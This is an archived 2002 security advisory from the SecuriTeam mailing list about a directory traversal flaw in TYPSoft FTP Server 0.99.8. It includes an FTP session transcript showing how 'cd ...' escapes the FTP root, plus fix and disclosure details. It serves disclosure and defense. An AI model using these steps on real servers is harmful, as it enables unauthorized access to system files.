[NT] TYPSoft FTP Server Directory Traversal Vulnerability

From: support@securiteam.com
Date: 12/17/02

  • Next message: support@securiteam.com: "[NT] Multiple Exploitable Buffer Overflows in Winamp" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 18 Dec 2002 00:40:44 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      TYPSoft FTP Server Directory Traversal Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

    Marc Bergeron's <http://www.typsoft.com/index.php?&lang=engPSoft
    multilingual Windows-based FTP server supports standard FTP commands,
    virtual file system architecture, transfer resumes, IP restrictions and
    logging. A vulnerability in the product allows remote attackers to cause
    the server to traverse into directories that reside outside the bounding
    FTP root directory.

    DETAILS

    Vulnerable systems:
     * TYPSoft FTP Server version 0.99.8

    Immune systems:
     * TYPSoft FTP Server version 0.99.13

    TYPSoft's failure to filter out "." sequences in URL requests allows
    remote users to break out of restricted directories and gain read access
    to the system directory structure; arbitrary file retrieval is not
    possible, however.

    The following transcript demonstrates a sample exploitation of the
    vulnerability:

    C:\>ftp 10.20.30.40
    Connected to 10.20.30.40.
    220 TYPSoft FTP Server 0.99.8 ready...
    User (10.20.30.40:(none)): anonymous
    331 Password required for anonymous.
    Password:
    230 User anonymous logged in.
    ftp> ls
    200 Port command successful.
    150 Opening data connection for directory list.
     
    .
    226 Transfer complete.
    ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
    ftp> cd /
    250 CWD command successful. "/C:/Inetpub/ftproot/" is current directory.
    ftp> ls
    200 Port command successful.
    150 Opening data connection for directory list.
     
    .
    226 Transfer complete.
    ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
    ftp> cd ..
    550 'C:\Inetpub\ftproot\Inetpub\': no such file or directory.
    ftp> ls
    200 Port command successful.
    150 Opening data connection for directory list.
     
    .
    226 Transfer complete.
    ftp: 7 bytes received in 0.00Seconds 7000.00Kbytes/sec.
    ftp> cd ...
    250 CWD command successful. "/C:/Inetpub/ftproot/.../" is current
    directory.
    ftp> ls
    200 Port command successful.
    150 Opening data connection for directory list.
     
    .
    AdminScripts
    ftproot
    iissamples
    mailroot
    Scripts
    webpub
    wwwroot
    226 Transfer complete.
    ftp: 78 bytes received in 0.01Seconds 7.80Kbytes/sec.
    ftp> bye
    221 Goodbye!

    Analysis:
    Any remote user with legitimate or anonymous access to an affected TYPSoft
    FTP server can exploit the vulnerability and freely browse the target
    system's directory structure. Such information could prove useful in
    subsequent attacks as well as provide information useful for an attacker
    to successfully conduct social engineering attacks.

    Detection:
    TYPSoft FTP Server 0.99.8 is vulnerable to the above-described attack.
    Earlier versions may be susceptible as well. To determine if a specific
    implementation is vulnerable, experiment by following the above
    transcript.

    Vendor response:
    TYPSoft FTP Server 0.99.13 fixes this issue. The latest version is
    available from <http://www.typsoft.com/download.php?prog=ftp&lang=eng<a href="mailto:list-subscribe@securiteam.com?subject=The information has been provided by <mailto:listserv@idefense.com>
    http://www.typsoft.com/download.php?prog=ftp&lang=eng <br> 10/25/2002 Issue disclosed to iDEFENSE

    Disclosure timeline:
    10/25/2002 Issue disclosed to iDEFENSE
    11/22/2002 Author notified (support@typsoft.com)
    11/22/2002 iDEFENSE clients notified
    11/23/2002 Responses received from support@typsoft.com
    12/16/2002 Public Disclosure

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:listserv@idefense.com>
    iDEFENSE Labs, the vulnerability was discovered by
    <mailto:ts@securityoffice.net> Tamer Sahin.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages